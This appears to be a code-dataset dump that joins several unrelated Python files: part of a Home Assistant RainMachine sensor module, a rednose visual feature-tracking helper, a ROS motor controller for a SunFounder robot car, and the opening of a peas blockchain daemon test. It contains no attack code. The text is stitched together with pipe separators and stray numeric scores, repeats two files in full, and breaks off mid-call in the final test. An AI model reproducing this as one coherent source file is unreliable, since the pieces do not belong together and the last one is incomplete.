key=TYPE_FREEZE_TEMP,
name="Freeze Protect Temperature",
icon="mdi:thermometer",
native_unit_of_measurement=TEMP_CELSIUS,
device_class=DEVICE_CLASS_TEMPERATURE,
state_class=STATE_CLASS_MEASUREMENT,
api_category=DATA_RESTRICTIONS_UNIVERSAL,
),
)
async def async_setup_entry(
hass: HomeAssistant, entry: ConfigEntry, async_add_entities: AddEntitiesCallback
) -> None:
"""Set up RainMachine sensors based on a config entry."""
controller = hass.data[DOMAIN][DATA_CONTROLLER][entry.entry_id]
coordinators = hass.data[DOMAIN][DATA_COORDINATOR][entry.entry_id]
@callback
def async_get_sensor(api_category: str) -> partial:
"""Generate the appropriate sensor object for an API category."""
if api_category == DATA_PROVISION_SETTINGS:
return partial(
ProvisionSettingsSensor,
entry,
coordinators[DATA_PROVISION_SETTINGS],
)
return partial(
UniversalRestrictionsSensor,
entry,
coordinators[DATA_RESTRICTIONS_UNIVERSAL],
)
async_add_entities(
[
async_get_sensor(description.api_category)(controller, description)
for description in SENSOR_DESCRIPTIONS
]
)
class ProvisionSettingsSensor(RainMachineEntity, SensorEntity):
"""Define a sensor that handles provisioning data."""
@callback
def update_from_latest_data(self) -> None:
"""Update the state."""
if self.entity_description.key == TYPE_FLOW_SENSOR_CLICK_M3:
self._attr_native_value = self.coordinator.data["system"].get(
"flowSensorClicksPerCubicMeter"
)
elif self.entity_description.key == TYPE_FLOW_SENSOR_CONSUMED_LITERS:
clicks = self.coordinator.data["system"].get("flowSensorWateringClicks")
clicks_per_m3 = self.coordinator.data["system"].get(
"flowSensorClicksPerCubicMeter"
)
if clicks and clicks_per_m3:
self._attr_native_value = (clicks * 1000) / clicks_per_m3
else:
self._attr_native_value = None
elif self.entity_description.key == TYPE_FLOW_SENSOR_START_INDEX:
self._attr_native_value = self.coordinator.data["system"].get(
"flowSensorStartIndex"
)
elif self.entity_description.key == TYPE_FLOW_SENSOR_WATERING_CLICKS:
self._attr_native_value = self.coordinator.data["system"].get(
"flowSensorWateringClicks"
)
class UniversalRestrictionsSensor(RainMachineEntity, SensorEntity):
"""Define a sensor that handles universal restrictions data."""
@callback
def update_from_latest_data(self) -> None:
"""Update the state."""
if self.entity_description.key == TYPE_FREEZE_TEMP:
self._attr_native_value = self.coordinator.data["freezeProtectTemp"] | 0.749362 | 0.081923 |
import os
import sys
import numpy as np
from rednose.helpers import TEMPLATE_DIR, load_code, write_code
from rednose.helpers.sympy_helpers import quat_matrix_l, rot_matrix
def sane(track):
img_pos = track[1:, 2:4]
diffs_x = abs(img_pos[1:, 0] - img_pos[:-1, 0])
diffs_y = abs(img_pos[1:, 1] - img_pos[:-1, 1])
for i in range(1, len(diffs_x)):
if ((diffs_x[i] > 0.05 or diffs_x[i - 1] > 0.05) and
(diffs_x[i] > 2 * diffs_x[i - 1] or
diffs_x[i] < .5 * diffs_x[i - 1])) or \
((diffs_y[i] > 0.05 or diffs_y[i - 1] > 0.05) and
(diffs_y[i] > 2 * diffs_y[i - 1] or
diffs_y[i] < .5 * diffs_y[i - 1])):
return False
return True
class FeatureHandler():
name = 'feature_handler'
@staticmethod
def generate_code(generated_dir, K=5):
# Wrap c code for slow matching
c_header = "\nvoid merge_features(double *tracks, double *features, long long *empty_idxs);"
c_code = "#include <math.h>\n"
c_code += "#include <string.h>\n"
c_code += "#define K %d\n" % K
c_code += "extern \"C\" {\n"
c_code += "\n" + open(os.path.join(TEMPLATE_DIR, "feature_handler.c")).read()
c_code += "\n}\n"
filename = f"{FeatureHandler.name}_{K}"
write_code(generated_dir, filename, c_code, c_header)
def __init__(self, generated_dir, K=5):
self.MAX_TRACKS = 6000
self.K = K
# Array of tracks, each track has K 5D features preceded
# by 5 params that inidicate [f_idx, last_idx, updated, complete, valid]
# f_idx: idx of current last feature in track
# idx of of last feature in frame
# bool for whether this track has been update
# bool for whether this track is complete
# bool for whether this track is valid
self.tracks = np.zeros((self.MAX_TRACKS, K + 1, 5))
self.tracks[:] = np.nan
name = f"{FeatureHandler.name}_{K}"
ffi, lib = load_code(generated_dir, name)
def merge_features_c(tracks, features, empty_idxs):
lib.merge_features(ffi.cast("double *", tracks.ctypes.data),
ffi.cast("double *", features.ctypes.data),
ffi.cast("long long *", empty_idxs.ctypes.data))
# self.merge_features = self.merge_features_python
self.merge_features = merge_features_c
def reset(self):
self.tracks[:] = np.nan
def merge_features_python(self, tracks, features, empty_idxs):
empty_idx = 0
for f in features:
match_idx = int(f[4])
if tracks[match_idx, 0, 1] == match_idx and tracks[match_idx, 0, 2] == 0:
tracks[match_idx, 0, 0] += 1
tracks[match_idx, 0, 1] = f[1]
tracks[match_idx, 0, 2] = 1
tracks[match_idx, int(tracks[match_idx, 0, 0])] = f
if tracks[match_idx, 0, 0] == self.K:
tracks[match_idx, 0, 3] = 1
if sane(tracks[match_idx]):
tracks[match_idx, 0, 4] = 1
else:
if empty_idx == len(empty_idxs):
print('need more empty space')
continue
tracks[empty_idxs[empty_idx], 0, 0] = 1
tracks[empty_idxs[empty_idx], 0, 1] = f[1]
tracks[empty_idxs[empty_idx], 0, 2] = 1
tracks[empty_idxs[empty_idx], 1] = f
empty_idx += 1
def update_tracks(self, features):
last_idxs = np.copy(self.tracks[:, 0, 1])
real = np.isfinite(last_idxs)
self.tracks[last_idxs[real].astype(int)] = self.tracks[real]
mask = np.ones(self.MAX_TRACKS, np.bool)
mask[last_idxs[real].astype(int)] = 0
empty_idxs = np.arange(self.MAX_TRACKS)[mask]
self.tracks[empty_idxs] = np.nan
self.tracks[:, 0, 2] = 0
self.merge_features(self.tracks, features, empty_idxs)
def handle_features(self, features):
self.update_tracks(features)
valid_idxs = self.tracks[:, 0, 4] == 1
complete_idxs = self.tracks[:, 0, 3] == 1
stale_idxs = self.tracks[:, 0, 2] == 0
valid_tracks = self.tracks[valid_idxs]
self.tracks[complete_idxs] = np.nan
self.tracks[stale_idxs] = np.nan
return valid_tracks[:, 1:, :4].reshape((len(valid_tracks), self.K * 4))
def generate_orient_error_jac(K):
import sympy as sp
from rednose.helpers.sympy_helpers import quat_rotate
x_sym = sp.MatrixSymbol('abr', 3, 1)
dtheta = sp.MatrixSymbol('dtheta', 3, 1)
delta_quat = sp.Matrix(np.ones(4))
delta_quat[1:, :] = sp.Matrix(0.5 * dtheta[0:3, :])
poses_sym = sp.MatrixSymbol('poses', 7 * K, 1)
img_pos_sym = sp.MatrixSymbol('img_positions', 2 * K, 1)
alpha, beta, rho = x_sym
to_c = sp.Matrix(rot_matrix(-np.pi / 2, -np.pi / 2, 0))
pos_0 = sp.Matrix(np.array(poses_sym[K * 7 - 7:K * 7 - 4])[:, 0])
q = quat_matrix_l(poses_sym[K * 7 - 4:K * 7]) * delta_quat
quat_rot = quat_rotate(*q)
rot_g_to_0 = to_c * quat_rot.T
rows = []
for i in range(K):
pos_i = sp.Matrix(np.array(poses_sym[i * 7:i * 7 + 3])[:, 0])
q = quat_matrix_l(poses_sym[7 * i + 3:7 * i + 7]) * delta_quat
quat_rot = quat_rotate(*q)
rot_g_to_i = to_c * quat_rot.T
rot_0_to_i = rot_g_to_i * (rot_g_to_0.T)
trans_0_to_i = rot_g_to_i * (pos_0 - pos_i)
funct_vec = rot_0_to_i * sp.Matrix([alpha, beta, 1]) + rho * trans_0_to_i
h1, h2, h3 = funct_vec
rows.append(h1 / h3 - img_pos_sym[i * 2 + 0])
rows.append(h2 / h3 - img_pos_sym[i * 2 + 1])
img_pos_residual_sym = sp.Matrix(rows)
# sympy into c
sympy_functions = []
sympy_functions.append(('orient_error_jac', img_pos_residual_sym.jacobian(dtheta), [x_sym, poses_sym, img_pos_sym, dtheta]))
return sympy_functions
if __name__ == "__main__":
K = int(sys.argv[1].split("_")[-1])
generated_dir = sys.argv[2]
FeatureHandler.generate_code(generated_dir, K=K) | rednose/helpers/feature_handler.py |
import os
import sys
import numpy as np
from rednose.helpers import TEMPLATE_DIR, load_code, write_code
from rednose.helpers.sympy_helpers import quat_matrix_l, rot_matrix
def sane(track):
img_pos = track[1:, 2:4]
diffs_x = abs(img_pos[1:, 0] - img_pos[:-1, 0])
diffs_y = abs(img_pos[1:, 1] - img_pos[:-1, 1])
for i in range(1, len(diffs_x)):
if ((diffs_x[i] > 0.05 or diffs_x[i - 1] > 0.05) and
(diffs_x[i] > 2 * diffs_x[i - 1] or
diffs_x[i] < .5 * diffs_x[i - 1])) or \
((diffs_y[i] > 0.05 or diffs_y[i - 1] > 0.05) and
(diffs_y[i] > 2 * diffs_y[i - 1] or
diffs_y[i] < .5 * diffs_y[i - 1])):
return False
return True
class FeatureHandler():
name = 'feature_handler'
@staticmethod
def generate_code(generated_dir, K=5):
# Wrap c code for slow matching
c_header = "\nvoid merge_features(double *tracks, double *features, long long *empty_idxs);"
c_code = "#include <math.h>\n"
c_code += "#include <string.h>\n"
c_code += "#define K %d\n" % K
c_code += "extern \"C\" {\n"
c_code += "\n" + open(os.path.join(TEMPLATE_DIR, "feature_handler.c")).read()
c_code += "\n}\n"
filename = f"{FeatureHandler.name}_{K}"
write_code(generated_dir, filename, c_code, c_header)
def __init__(self, generated_dir, K=5):
self.MAX_TRACKS = 6000
self.K = K
# Array of tracks, each track has K 5D features preceded
# by 5 params that inidicate [f_idx, last_idx, updated, complete, valid]
# f_idx: idx of current last feature in track
# idx of of last feature in frame
# bool for whether this track has been update
# bool for whether this track is complete
# bool for whether this track is valid
self.tracks = np.zeros((self.MAX_TRACKS, K + 1, 5))
self.tracks[:] = np.nan
name = f"{FeatureHandler.name}_{K}"
ffi, lib = load_code(generated_dir, name)
def merge_features_c(tracks, features, empty_idxs):
lib.merge_features(ffi.cast("double *", tracks.ctypes.data),
ffi.cast("double *", features.ctypes.data),
ffi.cast("long long *", empty_idxs.ctypes.data))
# self.merge_features = self.merge_features_python
self.merge_features = merge_features_c
def reset(self):
self.tracks[:] = np.nan
def merge_features_python(self, tracks, features, empty_idxs):
empty_idx = 0
for f in features:
match_idx = int(f[4])
if tracks[match_idx, 0, 1] == match_idx and tracks[match_idx, 0, 2] == 0:
tracks[match_idx, 0, 0] += 1
tracks[match_idx, 0, 1] = f[1]
tracks[match_idx, 0, 2] = 1
tracks[match_idx, int(tracks[match_idx, 0, 0])] = f
if tracks[match_idx, 0, 0] == self.K:
tracks[match_idx, 0, 3] = 1
if sane(tracks[match_idx]):
tracks[match_idx, 0, 4] = 1
else:
if empty_idx == len(empty_idxs):
print('need more empty space')
continue
tracks[empty_idxs[empty_idx], 0, 0] = 1
tracks[empty_idxs[empty_idx], 0, 1] = f[1]
tracks[empty_idxs[empty_idx], 0, 2] = 1
tracks[empty_idxs[empty_idx], 1] = f
empty_idx += 1
def update_tracks(self, features):
last_idxs = np.copy(self.tracks[:, 0, 1])
real = np.isfinite(last_idxs)
self.tracks[last_idxs[real].astype(int)] = self.tracks[real]
mask = np.ones(self.MAX_TRACKS, np.bool)
mask[last_idxs[real].astype(int)] = 0
empty_idxs = np.arange(self.MAX_TRACKS)[mask]
self.tracks[empty_idxs] = np.nan
self.tracks[:, 0, 2] = 0
self.merge_features(self.tracks, features, empty_idxs)
def handle_features(self, features):
self.update_tracks(features)
valid_idxs = self.tracks[:, 0, 4] == 1
complete_idxs = self.tracks[:, 0, 3] == 1
stale_idxs = self.tracks[:, 0, 2] == 0
valid_tracks = self.tracks[valid_idxs]
self.tracks[complete_idxs] = np.nan
self.tracks[stale_idxs] = np.nan
return valid_tracks[:, 1:, :4].reshape((len(valid_tracks), self.K * 4))
def generate_orient_error_jac(K):
import sympy as sp
from rednose.helpers.sympy_helpers import quat_rotate
x_sym = sp.MatrixSymbol('abr', 3, 1)
dtheta = sp.MatrixSymbol('dtheta', 3, 1)
delta_quat = sp.Matrix(np.ones(4))
delta_quat[1:, :] = sp.Matrix(0.5 * dtheta[0:3, :])
poses_sym = sp.MatrixSymbol('poses', 7 * K, 1)
img_pos_sym = sp.MatrixSymbol('img_positions', 2 * K, 1)
alpha, beta, rho = x_sym
to_c = sp.Matrix(rot_matrix(-np.pi / 2, -np.pi / 2, 0))
pos_0 = sp.Matrix(np.array(poses_sym[K * 7 - 7:K * 7 - 4])[:, 0])
q = quat_matrix_l(poses_sym[K * 7 - 4:K * 7]) * delta_quat
quat_rot = quat_rotate(*q)
rot_g_to_0 = to_c * quat_rot.T
rows = []
for i in range(K):
pos_i = sp.Matrix(np.array(poses_sym[i * 7:i * 7 + 3])[:, 0])
q = quat_matrix_l(poses_sym[7 * i + 3:7 * i + 7]) * delta_quat
quat_rot = quat_rotate(*q)
rot_g_to_i = to_c * quat_rot.T
rot_0_to_i = rot_g_to_i * (rot_g_to_0.T)
trans_0_to_i = rot_g_to_i * (pos_0 - pos_i)
funct_vec = rot_0_to_i * sp.Matrix([alpha, beta, 1]) + rho * trans_0_to_i
h1, h2, h3 = funct_vec
rows.append(h1 / h3 - img_pos_sym[i * 2 + 0])
rows.append(h2 / h3 - img_pos_sym[i * 2 + 1])
img_pos_residual_sym = sp.Matrix(rows)
# sympy into c
sympy_functions = []
sympy_functions.append(('orient_error_jac', img_pos_residual_sym.jacobian(dtheta), [x_sym, poses_sym, img_pos_sym, dtheta]))
return sympy_functions
if __name__ == "__main__":
K = int(sys.argv[1].split("_")[-1])
generated_dir = sys.argv[2]
FeatureHandler.generate_code(generated_dir, K=K) | 0.315103 | 0.372791 |
from __future__ import division
import time
import Adafruit_PCA9685
import RPi.GPIO as GPIO
from Adafruit_GPIO import I2C
import rospy
from geometry_msgs.msg import Twist
# sudo apt install RPi.GPIO
# pip install adafruit-pca9685
# pip install adafruit-gpio
class SunFounder:
# STEERING
# used for the DRIVE_TRAIN_TYPE=SUNFOUNDER_PWM
STEERING_CHANNEL = 0 # channel on the 9685 pwm board 0-15
STEERING_LEFT_PWM = 260 # pwm value for full left steering
STEERING_RIGHT_PWM = 500 # pwm value for full right steering
# THROTTLE
# used for the DRIVE_TRAIN_TYPE=SUNFOUNDER_PWM
THROTTLE_CHANNEL = 4 # channel on the 9685 pwm board 0-15
THROTTLE_MAX_PWM = 1200 # pwm value for max movement (throttle ->= 1, -1)
THROTTLE_MIN_PWM = 500 # pwm value for min movement (throttle -> 0)
# THROTTLE_ZERO_PWM = 0 #pwm value for no movement (throttle = 0)
def map_range(x, X_min, X_max, Y_min, Y_max):
'''
Linear mapping between two ranges of values
'''
X_range = X_max - X_min
Y_range = Y_max - Y_min
XY_ratio = X_range/Y_range
y = ((x-X_min) / XY_ratio + Y_min)
return int(y)
class PCA9685:
'''
PWM motor controller using PCA9685 boards.
This is used for most RC Cars
'''
def __init__(self, channel, address=0x40, frequency=60, busnum=None, init_delay=0.1):
self.default_freq = 60
self.pwm_scale = frequency / self.default_freq
# Initialise the PCA9685 using the default address (0x40).
if busnum is not None:
# replace the get_bus function with our own
def get_bus():
return busnum
I2C.get_default_bus = get_bus
self.pwm = Adafruit_PCA9685.PCA9685(address=address)
self.pwm.set_pwm_freq(frequency)
self.channel = channel
# time.sleep(init_delay) # "Tamiya TBLE-02" makes a little leap otherwise
def set_pulse(self, pulse):
try:
self.pwm.set_pwm(self.channel, 0, int(pulse * self.pwm_scale))
except:
self.pwm.set_pwm(self.channel, 0, int(pulse * self.pwm_scale))
def run(self, pulse):
self.set_pulse(pulse)
class PWMSteering:
"""
Wrapper over a PWM motor controller to convert angles to PWM pulses.
"""
LEFT_ANGLE = -1
RIGHT_ANGLE = 1
def __init__(self,
controller=None,
left_pulse=290,
right_pulse=490):
self.controller = controller
self.left_pulse = left_pulse
self.right_pulse = right_pulse
self.pulse = map_range(0, PWMSteering.LEFT_ANGLE, PWMSteering.RIGHT_ANGLE,
self.left_pulse, self.right_pulse)
self.running = True
rospy.loginfo('PWM Steering created')
def update(self):
while self.running:
self.controller.set_pulse(self.pulse)
def run(self, angle):
self.pulse = map_range(angle,
self.LEFT_ANGLE, self.RIGHT_ANGLE,
self.left_pulse, self.right_pulse)
self.controller.set_pulse(self.pulse)
def shutdown(self):
# set steering straight
self.run(0)
self.running = False
rospy.loginfo('PWM Steering shutdown')
class PWMThrottle:
"""
SunFounder DC Motor Controller.
Used for each motor on a differential drive car.
SunFounder Smart Video Car Kit V2.0/SunFounder PiCar V.
"""
Motor_A = 17 # GPIO pin for motor a
Motor_B = 27 # GPIO pin for motor b
PWM_A = 4 # pwm channel for motor a
PWM_B = 5 # pwm channel for motor b
FORWARD = False
BACKWARD = True
def __init__(self,
max_pulse=1200,
min_pulse=500):
self.max_pulse = 1200 if max_pulse == 0 else max_pulse
self.min_pulse = 500 if min_pulse == 0 else min_pulse
GPIO.setmode(GPIO.BCM)
GPIO.setup(PWMThrottle.Motor_A, GPIO.OUT)
GPIO.setup(PWMThrottle.Motor_B, GPIO.OUT)
self.motor_a = PCA9685(PWMThrottle.PWM_A)
self.motor_b = PCA9685(PWMThrottle.PWM_B)
GPIO.output(PWMThrottle.Motor_A, PWMThrottle.FORWARD)
GPIO.output(PWMThrottle.Motor_B, PWMThrottle.FORWARD)
self.dir = PWMThrottle.FORWARD
self.motor_a.set_pulse(0)
self.motor_b.set_pulse(0)
self.throttle = 0
self.pulse = 0
rospy.loginfo('PWM Throttle created')
def getPWM_throttle(self, throttle):
"""
Calculate the PWM pulse value from throttle, where 1 is full forward and
-1 is full backwards, 0 is stop.
"""
if throttle == 0:
direction = PWMThrottle.FORWARD
pulse = 0
elif throttle > 0:
direction = PWMThrottle.FORWARD
pulse = int(map_range(throttle, 0, 1,
self.min_pulse, self.max_pulse))
else:
direction = PWMThrottle.BACKWARD
pulse = int(map_range(throttle, -1, 0,
self.max_pulse, self.min_pulse))
return (direction, pulse)
def run(self, throttle):
"""
Update the throttle of the motor where 1 is full forward and
-1 is full backwards.
"""
if throttle > 1 or throttle < -1:
raise ValueError(
"throttle must be between 1(forward) and -1(reverse), but {}".format(throttle))
if self.throttle == throttle:
return
self.throttle = throttle
dir, pulse = self.getPWM_throttle(throttle)
if dir != self.dir:
GPIO.output(PWMThrottle.Motor_A, dir)
GPIO.output(PWMThrottle.Motor_B, dir)
self.dir = dir
if pulse != self.pulse:
self.motor_a.set_pulse(pulse)
self.motor_b.set_pulse(pulse)
self.pulse = pulse
rospy.loginfo("Throttle, v {}, d {}, p {}".format(throttle, dir, pulse))
def shutdown(self):
self.motor_a.run(0)
self.motor_b.run(0)
GPIO.output(PWMThrottle.Motor_A, GPIO.LOW)
GPIO.output(PWMThrottle.Motor_B, GPIO.LOW)
GPIO.cleanup()
rospy.loginfo('PWM Throttle shutdown')
class TerabotLowLevelCtrl():
STEERING_SCALE = -1.0
def __init__(self):
rospy.loginfo("Setting Up the Node...")
rospy.init_node('terabot_llc')
self.actuators = {}
self.actuators['throttle'] = PWMThrottle(
max_pulse=SunFounder.THROTTLE_MAX_PWM, min_pulse=SunFounder.THROTTLE_MIN_PWM)
steering_controller = PCA9685(SunFounder.STEERING_CHANNEL)
self.actuators['steering'] = PWMSteering(controller=steering_controller,
left_pulse=SunFounder.STEERING_LEFT_PWM,
right_pulse=SunFounder.STEERING_RIGHT_PWM)
# --- Create the Subscriber to Twist commands
self.ros_sub_twist = rospy.Subscriber(
"mobile_base_controller/cmd_vel", Twist, self.set_actuators_from_cmdvel, queue_size=1)
# --- Get the last time e got a commands
self._last_time_cmd_rcv = time.time()
self._timeout_s = 2
def set_actuators_from_cmdvel(self, message):
"""
Get a message from cmd_vel, assuming a maximum input of 1
"""
# -- Save the time
self._last_time_cmd_rcv = time.time()
# -- Convert vel into servo values
self.actuators['throttle'].run(message.linear.x)
self.actuators['steering'].run(message.angular.z * TerabotLowLevelCtrl.STEERING_SCALE)
rospy.loginfo("Got a command v = %2.1f w = %2.1f" %
(message.linear.x, message.angular.z))
def set_actuators_idle(self):
# -- Convert vel into servo values
self.actuators['throttle'].run(0)
self.actuators['steering'].run(0)
def shutdown(self):
# -- Convert vel into servo values
self.actuators['throttle'].shutdown()
self.actuators['steering'].shutdown()
@property
def is_controller_connected(self):
#rospy.loginfo("is_controller_connected %s" % (time.time() - self._last_time_cmd_rcv))
return(time.time() - self._last_time_cmd_rcv < self._timeout_s)
def run(self):
# --- Set the control rate
rate = rospy.Rate(5)
while not rospy.is_shutdown():
#rospy.loginfo("run %s %d" % (self._last_time_cmd_rcv, self.is_controller_connected))
if not self.is_controller_connected:
self.set_actuators_idle()
rate.sleep()
self.shutdown()
if __name__ == "__main__":
llc = TerabotLowLevelCtrl()
llc.run() | terabot_drive/src/base_control.py | from __future__ import division
import time
import Adafruit_PCA9685
import RPi.GPIO as GPIO
from Adafruit_GPIO import I2C
import rospy
from geometry_msgs.msg import Twist
# sudo apt install RPi.GPIO
# pip install adafruit-pca9685
# pip install adafruit-gpio
class SunFounder:
# STEERING
# used for the DRIVE_TRAIN_TYPE=SUNFOUNDER_PWM
STEERING_CHANNEL = 0 # channel on the 9685 pwm board 0-15
STEERING_LEFT_PWM = 260 # pwm value for full left steering
STEERING_RIGHT_PWM = 500 # pwm value for full right steering
# THROTTLE
# used for the DRIVE_TRAIN_TYPE=SUNFOUNDER_PWM
THROTTLE_CHANNEL = 4 # channel on the 9685 pwm board 0-15
THROTTLE_MAX_PWM = 1200 # pwm value for max movement (throttle ->= 1, -1)
THROTTLE_MIN_PWM = 500 # pwm value for min movement (throttle -> 0)
# THROTTLE_ZERO_PWM = 0 #pwm value for no movement (throttle = 0)
def map_range(x, X_min, X_max, Y_min, Y_max):
'''
Linear mapping between two ranges of values
'''
X_range = X_max - X_min
Y_range = Y_max - Y_min
XY_ratio = X_range/Y_range
y = ((x-X_min) / XY_ratio + Y_min)
return int(y)
class PCA9685:
'''
PWM motor controller using PCA9685 boards.
This is used for most RC Cars
'''
def __init__(self, channel, address=0x40, frequency=60, busnum=None, init_delay=0.1):
self.default_freq = 60
self.pwm_scale = frequency / self.default_freq
# Initialise the PCA9685 using the default address (0x40).
if busnum is not None:
# replace the get_bus function with our own
def get_bus():
return busnum
I2C.get_default_bus = get_bus
self.pwm = Adafruit_PCA9685.PCA9685(address=address)
self.pwm.set_pwm_freq(frequency)
self.channel = channel
# time.sleep(init_delay) # "Tamiya TBLE-02" makes a little leap otherwise
def set_pulse(self, pulse):
try:
self.pwm.set_pwm(self.channel, 0, int(pulse * self.pwm_scale))
except:
self.pwm.set_pwm(self.channel, 0, int(pulse * self.pwm_scale))
def run(self, pulse):
self.set_pulse(pulse)
class PWMSteering:
"""
Wrapper over a PWM motor controller to convert angles to PWM pulses.
"""
LEFT_ANGLE = -1
RIGHT_ANGLE = 1
def __init__(self,
controller=None,
left_pulse=290,
right_pulse=490):
self.controller = controller
self.left_pulse = left_pulse
self.right_pulse = right_pulse
self.pulse = map_range(0, PWMSteering.LEFT_ANGLE, PWMSteering.RIGHT_ANGLE,
self.left_pulse, self.right_pulse)
self.running = True
rospy.loginfo('PWM Steering created')
def update(self):
while self.running:
self.controller.set_pulse(self.pulse)
def run(self, angle):
self.pulse = map_range(angle,
self.LEFT_ANGLE, self.RIGHT_ANGLE,
self.left_pulse, self.right_pulse)
self.controller.set_pulse(self.pulse)
def shutdown(self):
# set steering straight
self.run(0)
self.running = False
rospy.loginfo('PWM Steering shutdown')
class PWMThrottle:
"""
SunFounder DC Motor Controller.
Used for each motor on a differential drive car.
SunFounder Smart Video Car Kit V2.0/SunFounder PiCar V.
"""
Motor_A = 17 # GPIO pin for motor a
Motor_B = 27 # GPIO pin for motor b
PWM_A = 4 # pwm channel for motor a
PWM_B = 5 # pwm channel for motor b
FORWARD = False
BACKWARD = True
def __init__(self,
max_pulse=1200,
min_pulse=500):
self.max_pulse = 1200 if max_pulse == 0 else max_pulse
self.min_pulse = 500 if min_pulse == 0 else min_pulse
GPIO.setmode(GPIO.BCM)
GPIO.setup(PWMThrottle.Motor_A, GPIO.OUT)
GPIO.setup(PWMThrottle.Motor_B, GPIO.OUT)
self.motor_a = PCA9685(PWMThrottle.PWM_A)
self.motor_b = PCA9685(PWMThrottle.PWM_B)
GPIO.output(PWMThrottle.Motor_A, PWMThrottle.FORWARD)
GPIO.output(PWMThrottle.Motor_B, PWMThrottle.FORWARD)
self.dir = PWMThrottle.FORWARD
self.motor_a.set_pulse(0)
self.motor_b.set_pulse(0)
self.throttle = 0
self.pulse = 0
rospy.loginfo('PWM Throttle created')
def getPWM_throttle(self, throttle):
"""
Calculate the PWM pulse value from throttle, where 1 is full forward and
-1 is full backwards, 0 is stop.
"""
if throttle == 0:
direction = PWMThrottle.FORWARD
pulse = 0
elif throttle > 0:
direction = PWMThrottle.FORWARD
pulse = int(map_range(throttle, 0, 1,
self.min_pulse, self.max_pulse))
else:
direction = PWMThrottle.BACKWARD
pulse = int(map_range(throttle, -1, 0,
self.max_pulse, self.min_pulse))
return (direction, pulse)
def run(self, throttle):
"""
Update the throttle of the motor where 1 is full forward and
-1 is full backwards.
"""
if throttle > 1 or throttle < -1:
raise ValueError(
"throttle must be between 1(forward) and -1(reverse), but {}".format(throttle))
if self.throttle == throttle:
return
self.throttle = throttle
dir, pulse = self.getPWM_throttle(throttle)
if dir != self.dir:
GPIO.output(PWMThrottle.Motor_A, dir)
GPIO.output(PWMThrottle.Motor_B, dir)
self.dir = dir
if pulse != self.pulse:
self.motor_a.set_pulse(pulse)
self.motor_b.set_pulse(pulse)
self.pulse = pulse
rospy.loginfo("Throttle, v {}, d {}, p {}".format(throttle, dir, pulse))
def shutdown(self):
self.motor_a.run(0)
self.motor_b.run(0)
GPIO.output(PWMThrottle.Motor_A, GPIO.LOW)
GPIO.output(PWMThrottle.Motor_B, GPIO.LOW)
GPIO.cleanup()
rospy.loginfo('PWM Throttle shutdown')
class TerabotLowLevelCtrl():
STEERING_SCALE = -1.0
def __init__(self):
rospy.loginfo("Setting Up the Node...")
rospy.init_node('terabot_llc')
self.actuators = {}
self.actuators['throttle'] = PWMThrottle(
max_pulse=SunFounder.THROTTLE_MAX_PWM, min_pulse=SunFounder.THROTTLE_MIN_PWM)
steering_controller = PCA9685(SunFounder.STEERING_CHANNEL)
self.actuators['steering'] = PWMSteering(controller=steering_controller,
left_pulse=SunFounder.STEERING_LEFT_PWM,
right_pulse=SunFounder.STEERING_RIGHT_PWM)
# --- Create the Subscriber to Twist commands
self.ros_sub_twist = rospy.Subscriber(
"mobile_base_controller/cmd_vel", Twist, self.set_actuators_from_cmdvel, queue_size=1)
# --- Get the last time e got a commands
self._last_time_cmd_rcv = time.time()
self._timeout_s = 2
def set_actuators_from_cmdvel(self, message):
"""
Get a message from cmd_vel, assuming a maximum input of 1
"""
# -- Save the time
self._last_time_cmd_rcv = time.time()
# -- Convert vel into servo values
self.actuators['throttle'].run(message.linear.x)
self.actuators['steering'].run(message.angular.z * TerabotLowLevelCtrl.STEERING_SCALE)
rospy.loginfo("Got a command v = %2.1f w = %2.1f" %
(message.linear.x, message.angular.z))
def set_actuators_idle(self):
# -- Convert vel into servo values
self.actuators['throttle'].run(0)
self.actuators['steering'].run(0)
def shutdown(self):
# -- Convert vel into servo values
self.actuators['throttle'].shutdown()
self.actuators['steering'].shutdown()
@property
def is_controller_connected(self):
#rospy.loginfo("is_controller_connected %s" % (time.time() - self._last_time_cmd_rcv))
return(time.time() - self._last_time_cmd_rcv < self._timeout_s)
def run(self):
# --- Set the control rate
rate = rospy.Rate(5)
while not rospy.is_shutdown():
#rospy.loginfo("run %s %d" % (self._last_time_cmd_rcv, self.is_controller_connected))
if not self.is_controller_connected:
self.set_actuators_idle()
rate.sleep()
self.shutdown()
if __name__ == "__main__":
llc = TerabotLowLevelCtrl()
llc.run() | 0.610918 | 0.155976 |
from peas.server.outbound_message import NodeType
from peas.server.server import ssl_context_for_server
from peas.types.peer_info import PeerInfo
from tests.block_tools import create_block_tools
from peas.util.ints import uint16
from peas.util.ws_message import create_payload
from tests.core.node_height import node_height_at_least
from tests.setup_nodes import setup_daemon, self_hostname, setup_full_system
from tests.simulation.test_simulation import test_constants_modified
from tests.time_out_assert import time_out_assert, time_out_assert_custom_interval
from tests.util.keyring import TempKeyring
import asyncio
import atexit
import json
import aiohttp
import pytest
def cleanup_keyring(keyring: TempKeyring):
keyring.cleanup()
temp_keyring1 = TempKeyring()
temp_keyring2 = TempKeyring()
atexit.register(cleanup_keyring, temp_keyring1)
atexit.register(cleanup_keyring, temp_keyring2)
b_tools = create_block_tools(constants=test_constants_modified, keychain=temp_keyring1.get_keychain())
b_tools_1 = create_block_tools(constants=test_constants_modified, keychain=temp_keyring2.get_keychain())
new_config = b_tools._config
new_config["daemon_port"] = 55401
b_tools.change_config(new_config)
class TestDaemon:
@pytest.fixture(scope="function")
async def get_daemon(self):
async for _ in setup_daemon(btools=b_tools):
yield _
@pytest.fixture(scope="function")
async def simulation(self):
async for _ in setup_full_system(
b_tools_1.constants, b_tools=b_tools, b_tools_1=b_tools_1, connect_to_daemon=True
):
yield _
@pytest.mark.asyncio
async def test_daemon_simulation(self, simulation, get_daemon):
node1, node2, _, _, _, _, _, _, _, server1 = simulation
await server1.start_client(PeerInfo(self_hostname, uint16(21238)))
async def num_connections():
count = len(node2.server.connection_by_type[NodeType.FULL_NODE].items())
return count
await time_out_assert_custom_interval(60, 1, num_connections, 1)
await time_out_assert(1500, node_height_at_least, True, node2, 1)
session = aiohttp.ClientSession()
crt_path = b_tools.root_path / b_tools.config["daemon_ssl"]["private_crt"]
key_path = b_tools.root_path / b_tools.config["daemon_ssl"]["private_key"]
ca_cert_path = b_tools.root_path / b_tools.config["private_ssl_ca"]["crt"]
ca_key_path = b_tools.root_path / b_tools.config["private_ssl_ca"]["key"]
ssl_context = ssl_context_for_server(ca_cert_path, ca_key_path, crt_path, key_path)
ws = await session.ws_connect(
"wss://127.0.0.1:55401",
autoclose=True,
autoping=True,
heartbeat=60,
ssl_context=ssl_context,
